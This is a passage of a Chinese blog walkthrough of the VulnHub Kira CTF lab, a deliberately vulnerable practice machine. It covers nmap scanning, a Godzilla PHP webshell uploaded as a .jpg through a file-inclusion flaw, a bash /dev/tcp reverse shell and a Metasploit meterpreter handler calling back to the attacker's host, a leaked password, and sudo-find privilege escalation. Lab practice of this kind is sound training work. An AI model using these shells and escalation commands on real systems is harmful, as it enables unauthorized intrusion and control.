vulnhub-kir-Ctf

下载靶机kir-Ctf

https://www.vulnhub.com/entry/kira-ctf,594/

打开靶机,  把这个靶机的虚拟网卡删除 ,再添加回来

1.信息收集

1.首先把靶机设为net 模式。  使用nmap 扫描靶机

因为nat模式的网络地址范围为;192.168.248.0 -244

nmap -sV -v 192.168.248.0/24       //扫描网段存活 的ip

发现 存活的ip  为  192.168.248.134

 

2.再对  192.168.248.134  进行详细扫描

发现了  80 端口  http 服务打开了     版本为Apache httpd 2.4.29 ((Ubuntu))

因为打开了80端口  使用浏览器查看

2.漏洞发现

查看网站含有的  文件包含漏洞

3.漏洞利用

所以接下来的解决办法就是,将webshell上传,然后通过文件包含漏洞, 通过上面的方式包含进去 ,然后利用

1.使用 哥斯拉 生成一个php webshell 上传,注意 文件要改成jpg 或者其他格式,绕过上传

2.使用language自带文件包含漏洞,包含上传文件

左下角的返现是我在123.php.jpg加的一句验证代码:<?php ech”okok!!”;?>

 

3.使用哥斯拉连接  成功连接

接下来就需要 在linux下反弹shell

(所谓反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击的shell反弹到我们的机器上)

在kali机 开启nc  监听端口

nc -lvp 8888

 

在哥斯拉 命令执行 模块  执行   反弹shell 命令

bash -i >& /dev/tcp/ 192.168.248.129/8888 0>&1

好吧  失败了 没成功

 

4.提权

接下来使用  msf  提权    傻瓜式操作

在kali 或者windows打开 Metasploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

 

注意  上面的lport  对应下方的 port  即都为4444

然后就可以进去

meterpreter > shell -t                    //直接开始交互式,做一些反馈用的
在交互式中输入  bash -i >& /dev/tcp/192.168.248.129/8888 0>&1

///原来刚才没成功是因为权限不够

查看目录 发现路径:http://192.168.248.134/supersecret-for-aziz/bassam-pass.txt

存在密码

得到密码:Password123!@#              用户名为:bassam

 

登陆账户

su  -  bassam

密码为: Password123!@#

 

得到flag

 

最后再来说一下Linux  提权

提权,顾名思义就是提升系统的权限, 一般进入内网中得到的权限也是比较小的,所以就需要提升权限,去完成更高级的操作,得到更多的信息

提权语句

sudo find . -exec /bin/sh \;  -quit                  //成功

Linux   nc  反弹命令

使用  msfconsole

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值